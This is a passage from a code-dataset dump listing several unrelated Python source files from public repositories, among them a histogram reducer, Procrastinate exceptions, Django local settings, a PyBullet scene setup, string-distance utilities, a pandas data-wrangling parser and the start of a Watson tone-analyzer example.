max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
dashboard_analytics/tasks/transaction_processor.py | Astewart1510/pvt-algoranddashboard | 0 | 6800 | <filename>dashboard_analytics/tasks/transaction_processor.py
from dashboard_analytics.models import AccountType, InstrumentType, Account, Transaction
def process_json_transactions(transactions):
for txn in transactions:
print(txn["pk"]) | 2.09375 | 2 |
MuonGun/resources/scripts/histreduce.py | hschwane/offline_production | 1 | 6801 | <reponame>hschwane/offline_production<filename>MuonGun/resources/scripts/histreduce.py
#!/usr/bin/env python
"""
Add all (potentially gigantic) histograms in a group of files.
"""
import dashi
import tables
import os, sys, operator, shutil
from optparse import OptionParser
parser = OptionParser(usage="%prog [OPTIONS] infiles outfile", description=__doc__)
parser.add_option("--blocksize", dest="blocksize", type=int, default=2048)
opts, args = parser.parse_args()
if len(args) < 2:
parser.error("You must specify at least one output and one input file")
infiles, outfile = args[:-1], args[-1]
if os.path.exists(outfile):
parser.error("%s already exists!" % outfile)
shutil.copy(infiles[0], outfile)
from collections import defaultdict
paths = defaultdict(list)
for fname in infiles[1:]:
with tables.openFile(fname) as hdf:
for group in hdf.walkNodes(where='/', classname='Group'):
if 'ndim' in group._v_attrs: # a dashi histogram
path = group._v_pathname
paths[path].append(fname)
def histadd(sourceGroup, destGroup, blocksize=1):
"""
Add dashi histograms stored in HDF5 groups
:param blocksize: operate on blocksize I/O chunks at a time
"""
for arr in '_h_bincontent', '_h_squaredweights':
source = sourceGroup._v_children[arr]
dest = destGroup._v_children[arr]
chunksize = blocksize*reduce(operator.mul, dest.chunkshape)
size = reduce(operator.mul, dest.shape)
for i in range(0, size, chunksize):
dest[i:i+chunksize] += source[i:i+chunksize]
for prop in 'nentries', 'nans', 'nans_wgt', 'nans_sqwgt':
destGroup._v_attrs[prop] += sourceGroup._v_attrs[prop]
with tables.openFile(outfile, 'a') as ohdf:
for path, fnames in paths.iteritems():
print(path)
destGroup = ohdf.getNode(path)
for fname in fnames:
with tables.openFile(fname) as hdf:
histadd(hdf.getNode(path), destGroup, opts.blocksize)
| 2.359375 | 2 |
procrastinate/exceptions.py | ignaciocabeza/procrastinate | 0 | 6802 | <filename>procrastinate/exceptions.py
import datetime
class ProcrastinateException(Exception):
"""
Unexpected Procrastinate error.
"""
def __init__(self, message=None):
if not message:
message = self.__doc__
super().__init__(message)
class TaskNotFound(ProcrastinateException):
"""
Task cannot be imported.
"""
class JobError(ProcrastinateException):
"""
Job ended with an exception.
"""
class LoadFromPathError(ImportError, ProcrastinateException):
"""
App was not found at the provided path, or the loaded object is not an App.
"""
class JobRetry(ProcrastinateException):
"""
Job should be retried.
"""
def __init__(self, scheduled_at: datetime.datetime):
self.scheduled_at = scheduled_at
super().__init__()
class AppNotOpen(ProcrastinateException):
"""
App was not open. Procrastinate App needs to be opened using:
- ``app.open()``,
- ``await app.open_async()``,
- ``with app.open():``,
- ``async with app.open_async():``.
"""
class ConnectorException(ProcrastinateException):
"""
Database error.
"""
# The precise error can be seen with ``exception.__cause__``.
class AlreadyEnqueued(ProcrastinateException):
"""
There is already a job waiting in the queue with the same queueing lock.
"""
class UniqueViolation(ConnectorException):
"""
A unique constraint is violated. The constraint name is available in
``exception.constraint_name``.
"""
def __init__(self, *args, constraint_name: str):
super().__init__(*args)
self.constraint_name = constraint_name
class MissingApp(ProcrastinateException):
"""
Missing app. This most probably happened because procrastinate needs an
app via --app or the PROCRASTINATE_APP environment variable.
"""
class SyncConnectorConfigurationError(ProcrastinateException):
"""
A synchronous connector (probably Psycopg2Connector) was used, but the operation
needs an asynchronous connector (AiopgConnector). Please check your App
configuration.
"""
| 2.96875 | 3 |
config/settings/local.py | vyshakTs/STORE_MANAGEMENT_SYSTEM | 0 | 6803 | from .base import *
DEBUG = True
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'SMS',
'USER': 'postgres',
'PASSWORD': 'password',
'HOST': 'localhost',
'PORT': '',
}
}
INSTALLED_APPS += [
'debug_toolbar.apps.DebugToolbarConfig',
'django_extensions',
]
ALLOWED_HOSTS += ['.herokuapp.com']
# Loads SECRET_KEY from .env file
# SECRET_KEY = get_env_variable('SECRET_KEY')
| 1.515625 | 2 |
question3.py | haojunsng/foodpanda-dataeng | 0 | 6804 | from functions import get_df, write_df
import geopy
from geopy import distance
"""
The function question3 takes in the latitude and longitude of potential distress locations,
and returns the nearest port with essential provisions such as water, fuel_oil and diesel.
"""
def question3(dataset_name, latitude, longitude):
df = get_df()
distress_location = (latitude, longitude)
ports_with_provisions = df[(df['provisions'] == True) & (df['water'] == True) & (df['fuel_oil'] == True) & (df['diesel'] == True)]
results = []
for each in ports_with_provisions.itertuples(index=False):
each_coords = (float(each[4]), float(each[5]))
dist = geopy.distance.geodesic(distress_location, each_coords)
results.append(dist.km)
ports_with_provisions['dist'] = results
answer3 = ports_with_provisions.sort_values(by='dist', ascending=True)[['country', 'port_name', 'port_latitude', 'port_longitude']].head(1)
write_df(answer3, dataset_name, 'Table for Question 3')
if __name__ == "__main__":
question3("foodpanda_tables", 32.610982, -38.706256)
| 3.671875 | 4 |
plugins/aea-cli-benchmark/aea_cli_benchmark/case_acn_communication/case.py | valory-xyz/agents-aea | 0 | 6805 | <reponame>valory-xyz/agents-aea<filename>plugins/aea-cli-benchmark/aea_cli_benchmark/case_acn_communication/case.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 <NAME>
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Check amount of time for acn connection communications."""
import asyncio
import logging
import os
import time
from contextlib import contextmanager
from tempfile import TemporaryDirectory
from typing import Callable, List, Tuple, Union
from aea_cli_benchmark.case_acn_communication.utils import (
DEFAULT_DELEGATE_PORT,
DEFAULT_MAILBOX_PORT,
DEFAULT_NODE_PORT,
_make_libp2p_client_connection,
_make_libp2p_connection,
_make_libp2p_mailbox_connection,
)
from aea.connections.base import Connection
from aea.mail.base import Envelope
from packages.fetchai.protocols.default.message import DefaultMessage
class TimeMeasure:
"""Time measure data class."""
def __init__(self):
"""Init data class instance."""
self.time = -1
@contextmanager
def time_measure():
"""Get time measure context."""
start = time.time()
m = TimeMeasure()
try:
yield m
finally:
m.time = time.time() - start
def make_envelope(from_addr: str, to_addr: str) -> Envelope:
"""Construct an envelope."""
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=to_addr,
sender=from_addr,
message=msg,
)
return envelope
async def _run(con_maker: Callable[..., Connection]) -> Tuple[float, float]:
"""Run test case and return times for the first and the second messages sent over ACN."""
try:
connections = []
genesis_node = _make_libp2p_connection(".", relay=True)
await genesis_node.connect()
connections.append(genesis_node)
genesis_multiaddr = genesis_node.node.multiaddrs[0]
relay_node1 = _make_libp2p_connection(
".",
relay=True,
entry_peers=[genesis_multiaddr],
port=DEFAULT_NODE_PORT + 1,
mailbox=True,
delegate=True,
mailbox_port=DEFAULT_MAILBOX_PORT + 1,
delegate_port=DEFAULT_DELEGATE_PORT + 1,
)
await relay_node1.connect()
connections.append(relay_node1)
relay_node2 = _make_libp2p_connection(
".",
relay=True,
entry_peers=[genesis_multiaddr],
port=DEFAULT_NODE_PORT + 2,
mailbox=True,
delegate=True,
mailbox_port=DEFAULT_MAILBOX_PORT + 2,
delegate_port=DEFAULT_DELEGATE_PORT + 2,
)
await relay_node2.connect()
connections.append(relay_node2)
relay_node1_multiaddr = relay_node1.node.multiaddrs[0]
relay_node2_multiaddr = relay_node2.node.multiaddrs[0]
await asyncio.sleep(1)
con1 = con_maker(
port=DEFAULT_NODE_PORT + 10,
entry_peer=relay_node1_multiaddr,
mailbox_port=DEFAULT_MAILBOX_PORT + 1,
delegate_port=DEFAULT_DELEGATE_PORT + 1,
pub_key=relay_node1.node.pub,
)
await con1.connect()
connections.append(con1)
con2 = con_maker(
port=DEFAULT_NODE_PORT + 20,
entry_peer=relay_node2_multiaddr,
mailbox_port=DEFAULT_MAILBOX_PORT + 2,
delegate_port=DEFAULT_DELEGATE_PORT + 2,
pub_key=relay_node2.node.pub,
)
await con2.connect()
connections.append(con2)
envelope = make_envelope(con1.address, con2.address)
with time_measure() as tm:
await con1.send(envelope)
envelope = await con2.receive()
first_time = tm.time
with time_measure() as tm:
await con1.send(envelope)
envelope = await con2.receive()
second_time = tm.time
return first_time, second_time
finally:
for con in reversed(connections):
await con.disconnect()
def run(connection: str, run_times: int = 10) -> List[Tuple[str, Union[int, float]]]:
"""Check construction time and memory usage."""
logging.basicConfig(level=logging.CRITICAL)
cwd = os.getcwd()
try:
if connection == "p2pnode":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_connection(".", port=port, entry_peers=[entry_peer])
elif connection == "client":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_client_connection(
peer_public_key=pub_key, data_dir=".", node_port=delegate_port
)
elif connection == "mailbox":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_mailbox_connection(
peer_public_key=pub_key, data_dir=".", node_port=mailbox_port
)
else:
raise ValueError(f"Unsupported connection: {connection}")
with TemporaryDirectory() as tmp_dir:
os.chdir(tmp_dir)
coro = _run(con_maker)
first_time, second_time = asyncio.get_event_loop().run_until_complete(coro)
return [
("first time (seconds)", first_time),
("second time (seconds)", second_time),
]
finally:
os.chdir(cwd)
| 1.703125 | 2 |
examples/pybullet/vr_kuka_setup.py | q4a/bullet3 | 12 | 6806 | import pybullet as p
#p.connect(p.UDP,"192.168.86.100")
p.connect(p.SHARED_MEMORY)
p.resetSimulation()
objects = [p.loadURDF("plane.urdf", 0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("samurai.urdf", 0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("pr2_gripper.urdf", 0.500000,0.300006,0.700000,-0.000000,-0.000000,-0.000031,1.000000)]
pr2_gripper = objects[0]
print ("pr2_gripper=")
print (pr2_gripper)
jointPositions=[ 0.550569, 0.000000, 0.549657, 0.000000 ]
for jointIndex in range (p.getNumJoints(pr2_gripper)):
p.resetJointState(pr2_gripper,jointIndex,jointPositions[jointIndex])
pr2_cid = p.createConstraint(pr2_gripper,-1,-1,-1,p.JOINT_FIXED,[0,0,0],[0.2,0,0],[0.500000,0.300006,0.700000])
print ("pr2_cid")
print (pr2_cid)
objects = [p.loadURDF("kuka_iiwa/model_vr_limits.urdf", 1.400000,-0.200000,0.600000,0.000000,0.000000,0.000000,1.000000)]
kuka = objects[0]
jointPositions=[ -0.000000, -0.000000, 0.000000, 1.570793, 0.000000, -1.036725, 0.000001 ]
for jointIndex in range (p.getNumJoints(kuka)):
p.resetJointState(kuka,jointIndex,jointPositions[jointIndex])
p.setJointMotorControl2(kuka,jointIndex,p.POSITION_CONTROL,jointPositions[jointIndex],0)
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.700000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.800000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.900000,0.000000,0.000000,0.000000,1.000000)]
objects = p.loadSDF("gripper/wsg50_one_motor_gripper_new_free_base.sdf")
kuka_gripper = objects[0]
print ("kuka gripper=")
print(kuka_gripper)
p.resetBasePositionAndOrientation(kuka_gripper,[0.923103,-0.200000,1.250036],[-0.000000,0.964531,-0.000002,-0.263970])
jointPositions=[ 0.000000, -0.011130, -0.206421, 0.205143, -0.009999, 0.000000, -0.010055, 0.000000 ]
for jointIndex in range (p.getNumJoints(kuka_gripper)):
p.resetJointState(kuka_gripper,jointIndex,jointPositions[jointIndex])
p.setJointMotorControl2(kuka_gripper,jointIndex,p.POSITION_CONTROL,jointPositions[jointIndex],0)
kuka_cid = p.createConstraint(kuka, 6, kuka_gripper,0,p.JOINT_FIXED, [0,0,0], [0,0,0.05],[0,0,0])
objects = [p.loadURDF("jenga/jenga.urdf", 1.300000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.200000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.100000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.000000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 0.900000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 0.800000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("table/table.urdf", 1.000000,-0.200000,0.000000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("teddy_vhacd.urdf", 1.050000,-0.500000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("cube_small.urdf", 0.950000,-0.100000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("sphere_small.urdf", 0.850000,-0.400000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("duck_vhacd.urdf", 0.850000,-0.400000,0.900000,0.000000,0.000000,0.707107,0.707107)]
objects = p.loadSDF("kiva_shelf/model.sdf")
ob = objects[0]
p.resetBasePositionAndOrientation(ob,[0.000000,1.000000,1.204500],[0.000000,0.000000,0.000000,1.000000])
objects = [p.loadURDF("teddy_vhacd.urdf", -0.100000,0.600000,0.850000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("sphere_small.urdf", -0.100000,0.955006,1.169706,0.633232,-0.000000,-0.000000,0.773962)]
objects = [p.loadURDF("cube_small.urdf", 0.300000,0.600000,0.850000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("table_square/table_square.urdf", -1.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
ob = objects[0]
jointPositions=[ 0.000000 ]
for jointIndex in range (p.getNumJoints(ob)):
p.resetJointState(ob,jointIndex,jointPositions[jointIndex])
objects = [p.loadURDF("husky/husky.urdf", 2.000000,-5.000000,1.000000,0.000000,0.000000,0.000000,1.000000)]
ob = objects[0]
jointPositions=[ 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000 ]
for jointIndex in range (p.getNumJoints(ob)):
p.resetJointState(ob,jointIndex,jointPositions[jointIndex])
p.setGravity(0.000000,0.000000,0.000000)
p.setGravity(0,0,-10)
p.stepSimulation()
p.disconnect()
| 2.21875 | 2 |
genomics_algo/utilities/string_cmp.py | SvoONs/genomics_algo | 0 | 6807 | <filename>genomics_algo/utilities/string_cmp.py<gh_stars>0
def longest_common_prefix(s1: str, s2: str) -> str:
"""
Finds the longest common prefix (substring) given two strings
s1: First string to compare
s2: Second string to compare
Returns:
Longest common prefix between s1 and s2
>>> longest_common_prefix("ACTA", "GCCT")
''
>>> longest_common_prefix("ACTA", "ACT")
'ACT'
>>> longest_common_prefix("ACT", "ACTA")
'ACT'
>>> longest_common_prefix("GATA", "GAAT")
'GA'
>>> longest_common_prefix("ATGA", "")
''
>>> longest_common_prefix("", "GCCT")
''
>>> longest_common_prefix("GCCT", "GCCT")
'GCCT'
"""
i = 0
while i < min(len(s1), len(s2)):
if s1[i] != s2[i]:
break
i += 1
return s1[:i]
def longest_common_suffix(s1: str, s2: str) -> str:
"""
Finds the longest common suffix (substring) given two strings
s1: First string to compare
s2: Second string to compare
Returns:
Longest common suffix between s1 and s2
>>> longest_common_suffix("ACTA", "GCCT")
''
>>> longest_common_suffix("ACTA", "CTA")
'CTA'
>>> longest_common_suffix("CTA", "ACTA")
'CTA'
>>> longest_common_suffix("GATAT", "GAATAT")
'ATAT'
>>> longest_common_suffix("ACTA", "")
''
>>> longest_common_suffix("", "GCCT")
''
>>> longest_common_suffix("GCCT", "GCCT")
'GCCT'
"""
return longest_common_prefix(s1[::-1], s2[::-1])[::-1]
def find_hamming_distance(s1: str, s2: str) -> int:
"""Compute the Hamming distance between two strings of equal length
>>> find_hamming_distance("ATG", "ATC")
1
>>> find_hamming_distance("ATG", "TGA")
3
>>> find_hamming_distance("A", "A")
0
>>> find_hamming_distance("ATG", "ATG")
0
>>> find_hamming_distance("", "")
0
>>> find_hamming_distance("GAGGTAGCGGCGTTTAAC", "GTGGTAACGGGGTTTAAC")
3
"""
assert len(s1) == len(s2)
return sum(1 for i in range(len(s1)) if s1[i] != s2[i])
def find_levenshtein_distance(s1: str, s2: str) -> int:
"""Compute the Levenshtein distance between two strings (i.e., minimum number
of edits including substitution, insertion and deletion needed in a string to
turn it into another)
>>> find_levenshtein_distance("AT", "")
2
>>> find_levenshtein_distance("AT", "ATC")
1
>>> find_levenshtein_distance("ATG", "ATC")
1
>>> find_levenshtein_distance("ATG", "TGA")
2
>>> find_levenshtein_distance("ATG", "ATG")
0
>>> find_levenshtein_distance("", "")
0
>>> find_levenshtein_distance("GAGGTAGCGGCGTTTAAC", "GTGGTAACGGGGTTTAAC")
3
>>> find_levenshtein_distance("TGGCCGCGCAAAAACAGC", "TGACCGCGCAAAACAGC")
2
>>> find_levenshtein_distance("GCGTATGCGGCTAACGC", "GCTATGCGGCTATACGC")
2
"""
# initializing a matrix for with `len(s1) + 1` rows and `len(s2) + 1` columns
D = [[0 for x in range(len(s2) + 1)] for y in range(len(s1) + 1)]
# fill first column
for i in range(len(s1) + 1):
D[i][0] = i
# fill first row
for j in range(len(s2) + 1):
D[0][j] = j
# fill rest of the matrix
for i in range(1, len(s1) + 1):
for j in range(1, len(s2) + 1):
distance_left = D[i][j - 1] + 1 # deletion in pattern
distance_above = D[i - 1][j] + 1 # insertion in pattern
distance_diagonal = D[i - 1][j - 1] + (
s1[i - 1] != s2[j - 1]
) # substitution
D[i][j] = min(distance_left, distance_above, distance_diagonal)
# return the last value (i.e., right most bottom value)
return D[-1][-1]
| 3.5 | 4 |
whyqd/parsers/wrangling_parser.py | whythawk/whyqd | 17 | 6808 | from __future__ import annotations
from typing import Optional, Dict, List, Union, Type, TYPE_CHECKING
from datetime import date, datetime
import pandas as pd
import numpy as np
import re
import locale
try:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
except locale.Error:
# Readthedocs has a problem, but difficult to replicate
locale.setlocale(locale.LC_ALL, "")
from . import CoreScript
from ..models import ColumnModel
from ..types import MimeType
if TYPE_CHECKING:
from ..schema import Schema
from ..models import DataSourceModel
class WranglingScript:
"""Get, review and restructure tabular data."""
def __init__(self):
self.check_source = CoreScript().check_source
self.core = CoreScript()
self.DATE_FORMATS = {
"date": {"fmt": ["%Y-%m-%d"], "txt": ["YYYY-MM-DD"]},
"datetime": {
"fmt": ["%Y-%m-%d %H:%M:%S", "%Y-%m-%d %H:%M:%S %Z%z"],
"txt": ["YYYY-MM-DD hh:mm:ss", "YYYY-MM-DD hh:mm:ss UTC+0000"],
},
"year": {"fmt": ["%Y"], "txt": ["YYYY"]},
}
def get_dataframe(
self,
source: str,
preserve: Union[str, List[str]] = None,
filetype: MimeType = MimeType.CSV,
names: Optional[List[str]] = None,
nrows: Optional[int] = None,
) -> Union[Dict[str, pd.DataFrame], pd.DataFrame]:
"""Return a Pandas dataframe from a given source.
Accepts default pandas parameters for Excel and CSV, but the objective is to preserve the source data with
little data conversion outside of the data wrangling process. With this in mind, a
Parameters
----------
source: str
Source filename.
preserve: str or list of str, default None
Column names where variable type guessing must be prevented and the original data preserved.
Critical for foreign key references with weird formats, like integers with leading `0`.
filetype: MimeType, default MimeType.CSV
Pandas can read a diversity of filetypes, but whyqd has only been tested on `xls`, `xlsx` and `csv`.
names: list of str, default None
If the source data has no header row, explicitly pass a list of names - in the correct order - to address
the data.
nrows: int, default None
A specified number of rows to return. For review, it is faster to load only a small number.
Returns
-------
DataFrame or dict of DataFrame
"""
self.check_source(source)
# If the dtypes have not been set, then ensure that any provided preserved columns remain untouched
# i.e. no forcing of text to numbers
# defaulting to `dtype = object` ...
kwargs = {}
if preserve:
if not isinstance(preserve, list):
preserve = [preserve]
# kwargs["dtype"] = {k: object for k in preserve}
kwargs["dtype"] = {k: pd.StringDtype() for k in preserve}
if names:
kwargs["header"] = None
kwargs["names"] = names
if nrows:
kwargs["nrows"] = nrows
# Check filetype
if filetype in [MimeType.XLS, MimeType.XLSX]:
# This will default to returning a dictionary of dataframes for each sheet
kwargs["sheet_name"] = None
df = pd.read_excel(source, **kwargs)
keys = list(df.keys())
for k in keys:
if df[k].empty:
del df[k]
if len(df.keys()) == 1:
df = df[keys[0]]
if filetype == MimeType.CSV:
# New in pandas 1.3: will ignore encoding errors - perfect for this initial wrangling process
kwargs["encoding_errors"] = "ignore"
# Supposed to help with fruity separater guessing
kwargs["engine"] = "python"
if not nrows:
df = pd.read_csv(source, **kwargs)
else:
kwargs["iterator"] = True
kwargs["chunksize"] = 10000
df_iterator = pd.read_csv(source, **kwargs)
df = pd.concat(df_iterator, ignore_index=True)
return df
def get_dataframe_from_datasource(self, data: DataSourceModel) -> pd.DataFrame:
"""Return the dataframe for a data source.
Parameters
----------
data: DataSourceModel
Returns
-------
pd.DataFrame
"""
path = data.path
try:
self.core.check_source(path)
except FileNotFoundError:
path = str(self.directory / data.source)
self.core.check_source(path)
df_columns = [d.name for d in data.columns]
names = [d.name for d in data.names] if data.names else None
df = self.get_dataframe(
source=path,
filetype=data.mime,
names=names,
preserve=[d.name for d in data.preserve if d.name in df_columns],
)
if isinstance(df, dict):
if df:
df = df[data.sheet_name]
else:
# It's an empty df for some reason. Maybe excessive filtering.
df = pd.DataFrame()
if df.empty:
raise ValueError(
f"Data source contains no data ({data.path}). Review actions to see if any were more destructive than expected."
)
return df
def get_dataframe_columns(self, df: pd.DataFrame) -> List(ColumnModel):
"""Returns a list of ColumnModels from a source DataFrame.
Parameters
----------
df: pd.DataFrame
Should be derived from `get_dataframe` with a sensible default for `nrows` being 50.
Returns
-------
List of ColumnModel
"""
# Prepare summary
columns = [
{"name": k, "type": "number"}
if v in ["float64", "int64"]
else {"name": k, "type": "date"}
if v in ["datetime64[ns]"]
else {"name": k, "type": "string"}
for k, v in df.dtypes.apply(lambda x: x.name).to_dict().items()
]
return [ColumnModel(**c) for c in columns]
def deduplicate_columns(self, df: pd.DataFrame, schema: Type[Schema]) -> pd.Index:
"""
Source: https://stackoverflow.com/a/65254771/295606
Source: https://stackoverflow.com/a/55405151
Returns a new column list permitting deduplication of dataframes which may result from merge.
Parameters
----------
df: pd.DataFrame
fields: list of FieldModel
Destination Schema fields
Returns
-------
pd.Index
Updated column names
"""
column_index = pd.Series(df.columns.tolist())
if df.columns.has_duplicates:
duplicates = column_index[column_index.duplicated()].unique()
for name in duplicates:
dups = column_index == name
replacements = [f"{name}{i}" if i != 0 else name for i in range(dups.sum())]
column_index.loc[dups] = replacements
# Fix any fields with the same name as any of the target fields
# Do this to 'force' schema assignment
for name in [f.name for f in schema.get.fields]:
dups = column_index == name
replacements = [f"{name}{i}__dd" if i != 0 else f"{name}__dd" for i in range(dups.sum())]
column_index.loc[dups] = replacements
return pd.Index(column_index)
# def check_column_unique(self, source: str, key: str) -> bool:
# """
# Test a column in a dataframe to ensure all values are unique.
# Parameters
# ----------
# source: Source filename
# key: Column name of field where data are to be tested for uniqueness
# Raises
# ------
# ValueError if not unique
# Returns
# -------
# bool, True if unique
# """
# df = self.get_dataframe(source, key)
# if len(df[key]) != len(df[key].unique()):
# import warnings
# filename = source.split("/")[-1] # Obfuscate the path
# e = "'{}' contains non-unique rows in column `{}`".format(filename, key)
# # raise ValueError(e)
# warnings.warn(e)
# return True
# def check_date_format(self, date_type: str, date_value: str) -> bool:
# # https://stackoverflow.com/a/37045601
# # https://www.saltycrane.com/blog/2009/05/converting-time-zones-datetime-objects-python/
# for fmt in self.DATE_FORMATS[date_type]["fmt"]:
# try:
# if date_value == datetime.strptime(date_value, fmt).strftime(fmt):
# return True
# except ValueError:
# continue
# raise ValueError(f"Incorrect date format, should be: `{self.DATE_FORMATS[date_type]['txt']}`")
###################################################################################################
### Pandas type parsers
###################################################################################################
def parse_dates(self, x: Union[None, str]) -> Union[pd.NaT, date.isoformat]:
"""
This is the hard-won 'trust nobody', certainly not Americans, date parser.
TODO: Replace with https://github.com/scrapinghub/dateparser
The only concern is that dateparser.parse(x).date().isoformat() will coerce *any* string to a date,
no matter *what* it is.
"""
if pd.isnull(x):
return pd.NaT
# Check if to_datetime can handle things
if not pd.isnull(pd.to_datetime(x, errors="coerce", dayfirst=True)):
return date.isoformat(pd.to_datetime(x, errors="coerce", dayfirst=True))
# Manually see if coersion will work
x = str(x).strip()[:10]
x = re.sub(r"[\\/,\.]", "-", x)
try:
y, m, d = x.split("-")
except ValueError:
return pd.NaT
if len(y) < 4:
# Swap the day and year positions
# Ignore US dates
d, m, y = x.split("-")
# Fat finger on 1999 ... not going to check for other date errors as no way to figure out
if y[0] == "9":
y = "1" + y[1:]
x = "{}-{}-{}".format(y, m, d)
try:
x = datetime.strptime(x, "%Y-%m-%d")
except ValueError:
return pd.NaT
x = date.isoformat(x)
try:
pd.Timestamp(x)
return x
except pd.errors.OutOfBoundsDatetime:
return pd.NaT
def parse_float(self, x: Union[str, int, float]) -> Union[np.nan, float]:
"""
Regex to extract wrecked floats: https://stackoverflow.com/a/385597
Checked against: https://regex101.com/
"""
try:
return float(x)
except ValueError:
re_float = re.compile(
r"""(?x)
^
\D* # first, match an optional sign *and space*
( # then match integers or f.p. mantissas:
\d+ # start out with a ...
(
\.\d* # mantissa of the form a.b or a.
)? # ? takes care of integers of the form a
|\.\d+ # mantissa of the form .b
)
([eE][+-]?\d+)? # finally, optionally match an exponent
$"""
)
try:
x = re_float.match(x).group(1)
x = re.sub(r"[^e0-9,-\.]", "", str(x))
return locale.atof(x)
except (ValueError, AttributeError):
return np.nan
| 2.28125 | 2 |
0x02-python-import_modules/2-args.py | FatChicken277/holbertonschool-higher_level_programming | 0 | 6809 | #!/usr/bin/python3
def args(args):
lenn = len(args) - 1
if lenn == 0:
print("0 arguments.")
elif lenn == 1:
print("{0} argument:".format(lenn))
print("{0}: {1}".format(lenn, args[lenn]))
elif lenn > 1:
print("{0} arguments:".format(lenn))
for i in range(lenn):
print("{0}: {1}".format(i+1, args[i+1]))
if __name__ == "__main__":
import sys
args(sys.argv)
| 3.859375 | 4 |
taurex/data/profiles/__init__.py | rychallener/TauREx3_public | 10 | 6810 | """
These modules contain sub-modules related to defining various profiles in a model
""" | 1.132813 | 1 |
day-2/part_b.py | yuetsin/AoC | 0 | 6811 | <gh_stars>0
#!/usr/bin/env python3
import re
def get_input() -> list:
with open('./input', 'r') as f:
return [v for v in [v.strip() for v in f.readlines()] if v]
lines = get_input()
count = 0
for line in lines:
lower, upper, char, password = re.split(r'-|: | ', line)
lower, upper = int(lower) - 1, int(upper) - 1
try:
if (password[lower] == char) ^ (password[upper] == char):
count += 1
except:
# don't care about boundaries
pass
print(count)
| 3.5 | 4 |
src/tone.py | devanshslnk/HelpOff | 2 | 6812 | from __future__ import print_function
import json
from os.path import join, dirname
from watson_developer_cloud import ToneAnalyzerV3
from watson_developer_cloud.tone_analyzer_v3 import ToneInput
from pprint import pprint
# If service instance provides API key authentication
# service = ToneAnalyzerV3(
# ## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/tone-analyzer/api',
# version='2017-09-21',
# iam_apikey='your_apikey')
service = ToneAnalyzerV3(
## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/tone-analyzer/api',
username='f0ec47cc-5191-4421-8fca-<PASSWORD>917e1<PASSWORD>',
password='<PASSWORD>',
version='2017-09-21')
# print("\ntone_chat() example 1:\n")
# utterances = [{
# 'text': 'I am very happy.',
# 'user': 'glenn'
# }, {
# 'text': 'It is a good day.',
# 'user': 'glenn'
# }]
# tone_chat = service.tone_chat(utterances).get_result()
# print(json.dumps(tone_chat, indent=2))
# print("\ntone() example 1:\n")
# print(
# json.dumps(
# service.tone(
# tone_input='I am very happy. It is a good day.',
# content_type="text/plain").get_result(),
# indent=2))
# print("\ntone() example 2:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(json.load(tone_json)['text'], "text/plain").get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 3:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(
# tone_input=json.load(tone_json)['text'],
# content_type='text/plain',
# sentences=True).get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 4:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(
